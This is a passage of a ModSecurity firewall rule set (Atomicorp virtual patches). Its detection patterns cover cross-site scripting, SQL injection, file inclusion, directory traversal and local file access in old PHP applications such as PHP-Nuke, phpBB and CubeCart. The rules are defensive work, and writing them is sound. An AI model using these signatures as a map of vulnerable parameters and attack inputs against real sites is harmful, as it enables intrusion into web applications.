#SecRule REQUEST_URI "/esupport/index.php\?_a=knowledgebase\&_j=subcat\&_i=[0-9].*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310323,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Kayako eSupport index.php cross-site-scripting attempt'"
# Rule 310325: phpSysInfo XSS vulns
#SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" #SecRule REQUEST_URI "/includes/system_footer\.php" # "chain,id:310325,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
#SecRule ARGS "^\"\>"
# Rule 310327: DigitalHive Remote Unathenticated Software Re-install and
# Cross-Site Scripting Vulnerabilities
#SecRule REQUEST_URI "/base\.php\?page=forum/msg\.php-afs-1-\"/\>\<script\>" # "id:310327,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'"
# Rule 310328: DigitalHive Remote Unathenticated Software Re-install and
# Cross-Site Scripting Vulnerabilities
#SecRule REQUEST_URI "/hive/base\.php\?page=membres\.php\&mt=\"/\>\<script\>" # "id:310328,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DigitalHive base.php cross-site-scripting attempt'"
# Rule 310329: Topic Calendar Mod for phpBB Cross-Site Scripting Attack
SecRule REQUEST_FILENAME "/calendar_scheduler\.php" "chain,id:310329,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Topic Calendar calendar_scheduler.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:start "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310331: phpSysInfo Cross-Site Scripting Vulnerabilities
#SecRule REQUEST_URI "/includes/system_footer\.php\?text.*=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310331,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
# Rule 310332: phpSysInfo Cross-Site Scripting Vulnerabilities
#SecRule REQUEST_URI "/includes/system_footer\.php\?text[template]=\"\>.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310332,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
# Rule 310333: phpSysInfo Cross-Site Scripting Vulnerabilities
#SecRule REQUEST_URI "/includes/system_footer\.php\?hide_picklist=.*=\<iframe src.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310333,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpSysInfo system_footer.php cross-site-scripting attempt'"
# Rule 310338: Vortex Portal Remote File Inclusion and Path Disclosure
# Vulnerabilities
SecRule REQUEST_URI "/content\.php\?act=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310338,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Dream4 Koobi CMS content.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310339: Topic Calendar Cross Site Scripting
#SecRule REQUEST_URI "/calendar_scheduler\.php\?start.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310339,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Topic Calendar calendar_scheduler.php cross-site-scripting attempt'"
# Rule 310340: ESMI PayPal Storefront SQL inject and XSS
SecRule REQUEST_URI "/ecdis/pages.php?idpages=\'" "id:310340,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront pages.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310341: ESMI PayPal Storefront SQL inject and XSS
#SecRule REQUEST_URI "/ecdis/products.*.php?id=.*&id.*=\'" # "id:310341,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront products.php SQL injection attempt'"
# Rule 310342: ESMI PayPal Storefront SQL inject and XSS
#SecRule REQUEST_URI "/ecdis/products.*\.php\?id=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310342,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ESMI Paypal Storefront products.php cross-site-scripting attempt'"
# Rule 310343: Nuke Bookmarks modules.php SQL Injection Vulnerability
#SecRule REQUEST_URI "modules\.php\?name=bookmarks\&file=marks\&catname=.*\&category=.*/\*\*/(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9| ]+[[:space:]](?:from|into|table|database|index|view)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310343,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PostNuke bookmarks modules.php SQL injection attempt'"
# Rule 310344: Nuke Bookmarks XSS
#SecRule REQUEST_URI "/modules\.php\?name=bookmarks\&file=(?:del_cat\&catname|del_mark\&markname|edit_cat\&catname|edit_cat\&catcomment|marks\&catname|uploadbookmarks\&category)=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310344,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PostNuke bookmarks modules.php cross-site-scripting attempt'"
# Rule 310345:possible new vuln in tikiwiki
SecRule REQUEST_URI "/tiki-list_faqs\.php\?offset=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310345,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki tiki-list_faqs.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310348:exoops Input Validation Flaws SQL injection and XSS
#SecRule REQUEST_URI "/newbb/viewforum\.php\?sortname=p\.post_time\&sortorder=.*\&sortdays=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310348,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: eXoops viewforum.php cross-site-scripting attempt'"
# Rule 310350: Valdersoft Shopping Cart SQL injection and XSS
#SecRule REQUEST_URI "/(?:item|category).php?sid=.*\&id=\'" # "id:310350,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Valdersoft Shopping Cart (item,category).php SQL injection attempt'"
# Rule 310352: Valdersoft Shopping Cart SQL injection and XSS
#SecRule REQUEST_URI "/search_result\.php\?sid=.*\&search.*\'" # "id:310352,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Valdersoft Shopping Cart search_result.php SQL injection attempt'"
#
# Rule 310353:OSCommerce XSS
SecRule REQUEST_URI "/default\.php\? " "chain,id:310353,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OSCommerce default.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule REQUEST_URI "(?:error_message|info_message)" chain
SecRule REQUEST_URI "(?:(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310354:Typo3 remote file retrieval
SecRule REQUEST_URI "/dev/translations\.php\?only=\x2e\x2e/\x2e\x2e/\x2e\x2e/\x2e\x2e/\x2e\x2e/" "id:310354,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Type3 translations.php remote file retrieval attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310355:Mambo XSS
SecRule REQUEST_FILENAME "/emailfriend/(?:emailarticle|emailfaq|emailnews)\.php" "chain,id:310355,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mambo email(article,faq,news).php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id "(?:\<script|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310356:Photopost XSS and sql injection
#SecRule REQUEST_URI "photos/(?:showgallery|showmembers|slideshow)\.php\?.*\' " # "id:310356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Photopost SQL injection attempt'"
# Rule 310357:Photopost XSS and sql injection
SecRule REQUEST_URI "photos/(?:showgallery|showmembers|slideshow)\.php" "chain,id:310357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Photopost cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS "(?:\<script|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310358:TKai's Shoutbox XSS
#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310358,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
# Rule 310359:TKai's Shoutbox XSS
#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&name=default&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310359,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
# Rule 310360:TKai's Shoutbox XSS
#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&email=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310360,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
# Rule 310361:TKai's Shoutbox XSS
#SecRule REQUEST_URI "/shoutact\.php\?yousay=default\&email=default\&name=default\&query=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310361,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
# Rule 310362:TKai's Shoutbox XSS
#SecRule REQUEST_URI "/shoutact\.php\?yousay=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310362,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TKais Shoutbox shoutact.php cross-site-scripting attempt'"
# Rule 310363:EncapsBB Remote File Inclusion Vulnerability
#SecRule REQUEST_URI "/index_header.php?root=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" # "id:310363,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EncapsBB index_header.php remote file inclusion attempt'"
# Rule 310366:PHPCoin
SecRule REQUEST_URI "phpcoin/auxpage\.php\?page=\.\./\.\." "id:310366,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPcoin auxpage.php directory traversal attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310373:PunBB version <= 1.2.2 auth bypass exploit
#SecRule REQUEST_URI "profile\.php\?section=admin\&id=.*\&action=foo" # "id:310373,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PunBB profile.php authentication bypass attempt'"
# Rule 310378:PaFiledb Version 3.1 and below SQL injection and XSS
SecRule REQUEST_URI "/pafiledb\.php\?action=viewall&id=&start=\'" "id:310378,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PaFiledb pafiledb.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310379:PaFiledb Version 3.1 and below SQL injection and XSS
SecRule REQUEST_URI "/pafiledb\.php" "chain,id:310379,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PaFiledb pafiledb.php cross-site-scripting attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:id "(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Rule 310381:PHPNuke general SQL injection
SecRule REQUEST_URI "/modules\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310381,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:name "union.*select"
# Rule 310394:phpbb 2.0.13 download vuln
#SecRule REQUEST_URI "/downloads\.php\?cat=.*(?:union|select|delete|insert)*user_password.*phpbb_users" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310394,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB downloads.php SQL injection attempt'"
# Rule 310395:Turnkey Websites Shopping Cart SQL injection
#SecRule REQUEST_URI "/searchresults\.php\?searchTerm=\'" # "id:310395,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Turnkey Shopping Cart searchresults.php SQL injection attempt'"
# Rule 310396:Turnkey Websites Shopping Cart SQL injection
#SecRule REQUEST_URI "/searchresults\.php\?searchTerm=.*\'" # "id:310396,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Turnkey Shopping Cart searchresults.php SQL injection attempt'"
# Rule 310397:Authentication bypass, directory transversal and XSS
# vulnerabilities in PayProCart 3.0
#SecRule REQUEST_URI "/usrdetails\.php\?sgnuptype=.*(?:(?:javsscript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310397,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PayProCart v3.0 usrdetails.php authentication bypass attempt'"
# Rule 310399: PhpNuke 7.6=>x Multiple vulnerabilities cXIb8O3.12
#SecRule REQUEST_URI "/banners\.php\?op=emailstats&name=.*&bid=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310399,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 banners.php cross-site-scripting attempt'"
# Rule 310400: PhpNuke 7.6=>x Multiple vulnerabilities cXIb8O3.12
#SecRule REQUEST_URI "/modules\.php\?name=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310400,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php cross-site-scripting attempt'"
# Rule 310401: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners
# Modules Permit Cross-Site Scripting Attacks
#SecRule REQUEST_URI "/modules\.php\?name=search&author=.*&topic=.*&min.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310401,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php search cross-site-scripting attempt'"
# Rule 310402: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
#SecRule REQUEST_URI "/modules\.php\?name=faq&.*=.*&id_cat=.*&categories=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310402,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php FAQ cross-site-scripting attempt'"
# Rule 310403: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
#SecRule REQUEST_URI "/modules\.php\?op=emailstats&login=.*&cid=.*&bid=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310403,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php emailstats cross-site-scripting attempt'"
# Rule 310404: PHP-Nuke Input Validation Flaws in search, FAQ, and Banners Modules Permit Cross-Site Scripting Attacks
#SecRule REQUEST_URI "/modules\.php\?name=Encyclopedia&file=.*&op=.*&eid.*1&ltr=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310404,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke >=v7.6 modules.php Encyclopedia cross-site-scripting attempt'"
# Rule 310406: #phpBB Calendar Pro catergory Parameter SQL Injection
#SecRule REQUEST_URI "/cal_view_month\.php\?month=.*&year=.*&category=.*(?:union|select|delete|insert)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310406,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB cal_view_month.php SQL injection attempt'"
# Rule 310408: cubecart SQL injection
SecRule REQUEST_URI "/tellafriend\.php\?&product=\'" "id:310408,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart tellafriend.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310409: cubecart SQL injection
SecRule REQUEST_URI "/view_cart\.php\?add=\'" "id:310409,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart view_cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310410: cubecart SQL injection
SecRule REQUEST_URI "/view_product\.php\?product=\'" "id:310410,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cubecart view_product.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310411:PHPBB Links Pro Module SQL Injection Vulnerability
SecRule REQUEST_URI "/links\.php\?func=show&id=\'" "id:310411,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB links.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310412:LiteCommerce Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/cart\.php\?target=\'" "id:310412,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310413:LiteCommerce Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/cart\.php\?target=category&category_id=\'" "id:310413,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310414:LiteCommerce Multiple SQL Injection Vulnerabilities
SecRule REQUEST_URI "/cart\.php\?target=product&product_id=\'" "id:310414,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LiteCommerce cart.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310415:PHP-Nuke "querylang" SQL Injection Vulnerability
#SecRule REQUEST_URI "/modules\.php\?name=top&querylang=.*(?:union|select|delete|insert).*\" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310415,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPnuke modules.php querylang SQL injection attempt'"
# Rule 310416:PHPBB DLMan Pro Module SQL Injection Vulnerability
SecRule REQUEST_URI "/dlman\.php\?func=file_info&file_id=\'" "id:310416,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB dlman.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310417:ModernBill XSS and file include
SecRule REQUEST_URI "/samples/news\.php\?dir=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310417,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModernBill news.php file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310418:ModernBill XSS and file include
#SecRule REQUEST_URI|REQUEST_BODY "/order/orderwiz\.php\?v=.*&aid=.*(?:<[[:space:]]*(?:script|about|applet|activex|chrome)*>.*(?:script|about|applet|activex|chrome)[[:space:]]*>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310418,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModernBill news.php cross-site-scripting attempt'"
# Rule 310421:SQL injection in jPortal version 2.3.1
#SecRule REQUEST_URI "/jportal/banner\.php*(?:union|select|delete|insert)" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310421,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: jPortal banner.php SQL injection attempt'"
# Rule 310423:Serendipity exit.php SQL injection
#SecRule REQUEST_URI "exit\.php\?entry_id=.*&url_id=.*(union|select).*(?:password|username).*from" # "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310423,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Serendipity exit.php SQL injection attempt'"
# Rule 310424:phpbb plus
#SecRule REQUEST_URI "/groupcp\.php\?g=.*sid=\'" # "id:310424,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB groupcp.php SQL injection attempt'"
# Rule 310426:phpbb plus
SecRule REQUEST_URI "/portal\.php" "chain,id:310426,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB portal.php SQL injection attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:article "'"
# Rule 310427:phpbb plus
#SecRule REQUEST_URI "/viewforum.php?f=.*sid=\'" # "id:310427,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewforum.php SQL injection attempt'"
# Rule 310428:phpbb plus
#SecRule REQUEST_URI "/viewtopic.php?p=.*sid=\'" # "id:310428,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php SQL injection attempt'"
# Rule 310429:phpbb plus
#SecRule REQUEST_URI "/album_search\.php\?mode=\'" # "id:310429,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB viewtopic.php SQL injection attempt'"
# Rule 310430:phpbb plus
#SecRule REQUEST_URI "/album_cat\.php\?cat_id=.*sid=\'" # "id:310430,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB album_cat.php SQL injection attempt'"
# Rule 310431:phpbb plus
#SecRule REQUEST_URI "/album_comment\.php\?pic_id=.*sid=\'" # "id:310431,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB album_comment.php SQL injection attempt'"
# Rule 310432:phpbb plus
#SecRule REQUEST_URI "calendar_scheduler\.php\?d=.*&mode=&start=\'\">" # "id:310432,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB calendar_scheduler.php SQL injection attempt'"
# Rule 310436: SPHPBlog search.PHP Cross-Site Scripting Vulnerability
#SecRule REQUEST_URI "/search\.php\?q=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310436,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SPHPBlog search.php cross-site-scripting attempt'"
# Rule 310437:All4WWW-Homepagecreator
SecRule REQUEST_URI "/index.php?site=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:310437,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: All4WWW Homepage Creator index.php remote file inclusion attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310439:caught in honeypot
#SecRule REQUEST_URI "\.php\?(?:do=.*&template=\{\$\{|inc=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310439,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Unknown generic PHP remote file inclusion via template substitution attempt'"
# Rule 310440:phpMyAdmin path vln
SecRule REQUEST_URI "/css/phpmyadmin\.css\.php\?globals\[cfg\]\[themepath\]=/etc" "id:310440,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpMyAdmin phpmyadmin.css.php local file access attempt',t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
# Rule 310441:PHP-Nuke Web_Links Multiple Variable SQL Injection
SecRule REQUEST_URI "modules\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310441,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php SQL injection attempt',chain"
SecRule ARGS:email|ARGS:ratenum|ARGS:min|ARGS:show|ARGS:orderby|ARGS:url "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310442:phpCOIN SQL injection
SecRule REQUEST_URI "mod\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:310442,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCOIN mod.php SQL injection attempt',chain"
SecRule ARGS:faq_id|ARGS:id|ARGS:topic_id|ARGS:ord_id|ARGS:dom_id|ARGS:invd_id "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310443:NukeBookmarks SQL injection
SecRule REQUEST_URI "modules\.php" "id:310443,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Nukebookmarks modules.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:category "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310444:e107 SQL injection
SecRule REQUEST_URI "news\.php" "id:310444,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: e107 news.php SQL injection attempt',chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"
SecRule ARGS:list "(?:delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
# Rule 310446:PHP-Nuke http Response Splitting vuln
#SecRule REQUEST_URI "modules\.php\?name=Surveys&pollid=.*&forwarder=.*(?:(?:javascript|script|about|applet|activex|chrome)*\>|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" # "id:310446,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Nuke modules.php http response splitting attempt'"
# Rule 310447:AzDGDatingPlatinum view.php id Variable XSS
